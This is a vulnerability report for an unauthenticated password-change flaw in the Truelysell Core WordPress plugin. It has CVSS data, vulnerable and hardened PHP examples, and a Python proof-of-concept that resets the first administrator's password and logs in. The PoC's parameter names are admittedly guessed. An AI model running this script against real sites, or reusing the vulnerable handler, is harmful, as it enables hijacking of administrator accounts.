Security Vulnerability Report
CVE-2025-10742 (CVSS 9.8, CRITICAL)

Published: 2025-10-16 07:15:33
Last Modified: 2026-04-15 00:35:42

Description

The Truelysell Core plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 1.8.6. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. Note: This can only be exploited unauthenticated if the attacker knows which page contains the 'truelysell_edit_staff' shortcode.
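The weakness the advisory describes is CWE-639 (authorization bypass through a user-controlled key): the account to modify is chosen by an ID in the request, and nothing ties that ID to the caller. The following is an added illustration of that pattern in a WordPress shortcode form handler, with a hardened form beside it. It is not Truelysell Core's code; the handler names, the `staff_id` and `password` field names, and the nonce action are assumptions made for the example.

```php
<?php
// Added illustration of CWE-639 in a WordPress shortcode form handler.
// NOT the Truelysell Core plugin's code: handler, field and nonce names are assumed.

// Vulnerable pattern: the user ID that selects the target account comes straight
// from the request and is never compared against the caller. No login, nonce or
// capability check is made, so an unauthenticated POST to the page that renders
// the shortcode can reset any user's password, including an administrator's.
function hypothetical_edit_staff_vulnerable() {
    if ( isset( $_POST['staff_id'], $_POST['password'] ) ) {
        $user_id = (int) $_POST['staff_id'];                          // attacker-controlled object key
        wp_set_password( wp_unslash( $_POST['password'] ), $user_id ); // applied without authorization
        return '<p>Password updated.</p>';
    }
    return hypothetical_edit_staff_form();
}

// Hardened pattern: require a logged-in user and a valid nonce, then make the
// object-level check that actually closes the IDOR: the target must be the
// caller's own account, or the caller must hold the 'edit_user' capability for it.
function hypothetical_edit_staff_hardened() {
    if ( ! isset( $_POST['staff_id'], $_POST['password'] ) ) {
        return hypothetical_edit_staff_form();
    }
    if ( ! is_user_logged_in() ) {
        return '<p>You must be logged in.</p>';
    }
    if ( ! isset( $_POST['_wpnonce'] )
        || ! wp_verify_nonce( $_POST['_wpnonce'], 'hypothetical_edit_staff' ) ) {
        return '<p>Invalid request.</p>';
    }
    $user_id = (int) $_POST['staff_id'];
    if ( $user_id !== get_current_user_id() && ! current_user_can( 'edit_user', $user_id ) ) {
        return '<p>You are not allowed to change this account.</p>';
    }
    wp_set_password( wp_unslash( $_POST['password'] ), $user_id );
    return '<p>Password updated.</p>';
}

// The form the shortcode renders; the hidden staff_id is pre-filled with the
// caller's own ID, but the server must never trust it (hence the check above).
function hypothetical_edit_staff_form() {
    return '<form method="post">'
        . wp_nonce_field( 'hypothetical_edit_staff', '_wpnonce', true, false )
        . '<input type="hidden" name="staff_id" value="' . esc_attr( get_current_user_id() ) . '">'
        . '<input type="password" name="password">'
        . '<button type="submit">Save</button>'
        . '</form>';
}

add_shortcode( 'hypothetical_edit_staff', 'hypothetical_edit_staff_hardened' );
```

The nonce check on its own would not fix this class of bug: a nonce only proves the request came from a form WordPress rendered for that visitor, and a low-privileged user with a valid nonce could still submit another user's ID. The line that closes the hole is the comparison of `$user_id` against `get_current_user_id()` / `current_user_can( 'edit_user', $user_id )`. Until the plugin is updated past 1.8.6, restricting access to the page that carries the `truelysell_edit_staff` shortcode reduces exposure, since the advisory notes unauthenticated exploitation requires knowing that page.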

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is recorded for this CVE. Affected product, from the description: Truelysell Core <= 1.8.6.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10742 PoC - Truelysell Core Arbitrary Password Change
# Vulnerability: Unauthenticated Arbitrary User Password Change
# Affected: Truelysell Core <= 1.8.6
#
# NOTE: the advisory only states that the form handled by the
# 'truelysell_edit_staff' shortcode changes passwords without an
# authorization check. The request parameter names used below
# (truelysell_action, user_id, new_password, confirm_password, staff_nonce)
# are assumptions of this PoC, not taken from the advisory, and must be
# confirmed against the plugin's rendered form before use.
import requests

# Target configuration
TARGET_URL = "http://target-wordpress-site.com"
# The page containing the 'truelysell_edit_staff' shortcode
SHORTCODE_PAGE = "/page-with-truelysell-edit-staff/"


def exploit_password_change(target_url, shortcode_page, user_id, new_password):
    """
    Exploit the arbitrary password change vulnerability in Truelysell Core.

    The plugin fails to verify user authorization when processing the
    'truelysell_edit_staff' shortcode form, allowing unauthenticated
    password changes for an arbitrary user ID.
    """
    endpoint = target_url.rstrip('/') + shortcode_page

    # Construct the malicious payload. The plugin accepts user-controlled
    # parameters without proper authorization checks; the field names here
    # are assumed (see NOTE above).
    payload = {
        'truelysell_action': 'edit_staff',
        'user_id': str(user_id),
        'new_password': new_password,
        'confirm_password': new_password,
        # Additional parameters that may be required by the plugin
        'staff_nonce': '',  # May be empty or bypassed
    }

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest',
    }

    try:
        # Send the unauthenticated password change request
        response = requests.post(
            endpoint,
            data=payload,
            headers=headers,
            timeout=30,
            allow_redirects=False,
        )

        # A 200, or a redirect back to the page after a form POST, only means
        # the request was accepted; success is confirmed by logging in below.
        if response.status_code in (200, 302):
            print("[+] Password change request sent successfully")
            print(f"[+] Target User ID: {user_id}")
            print(f"[+] New Password: {new_password}")
            return True
        print(f"[-] Request failed with status code: {response.status_code}")
        return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return False


def login_as_admin(target_url, username, password):
    """Log in with the newly set credentials to verify exploitation."""
    base_url = target_url.rstrip('/')
    login_url = base_url + '/wp-login.php'
    session = requests.Session()

    payload = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': base_url + '/wp-admin/',
        'testcookie': '1',
    }
    # wp-login.php refuses logins unless the test cookie is present
    cookies = {'wordpress_test_cookie': 'WP+Cookie+check'}

    response = session.post(
        login_url, data=payload, cookies=cookies, allow_redirects=True, timeout=30
    )

    if 'wp-admin' in response.url or 'dashboard' in response.text.lower():
        print(f"[+] Successfully logged in as {username}!")
        return True
    print("[-] Login failed")
    return False


if __name__ == "__main__":
    # Step 1: Find the page with the 'truelysell_edit_staff' shortcode
    #         (via Google dork or crawling). Example: site:target.com inurl:staff

    # Step 2: Change the admin password (user ID 1 is typically the first admin)
    target_user_id = 1
    new_password = "PwnedByCVE-2025-10742!"

    print(f"[*] Targeting: {TARGET_URL}")
    print(f"[*] Attempting to change password for user ID: {target_user_id}")

    if exploit_password_change(TARGET_URL, SHORTCODE_PAGE, target_user_id, new_password):
        # Step 3: Log in with the new credentials. The username 'admin' is an
        #         assumption; look up the real login name for the target user ID.
        login_as_admin(TARGET_URL, "admin", new_password)
```

References

- https://themeforest.net/item/truelysell-service-booking-wordpress-theme/43398124
- https://www.wordfence.com/threat-intel/vulnerabilities/id/a636e865-9556-4afb-8726-4537a160f379?source=cve
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10742", "sourceIdentifier": "[email protected]", "published": "2025-10-16T07:15:32.517", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Truelysell Core plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 1.8.6. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. Note: This can only be exploited unauthenticated if the attacker knows which page contains the 'truelysell_edit_staff' shortcode."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://themeforest.net/item/truelysell-service-booking-wordpress-theme/43398124", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a636e865-9556-4afb-8726-4537a160f379?source=cve", "source": "[email protected]"}]}}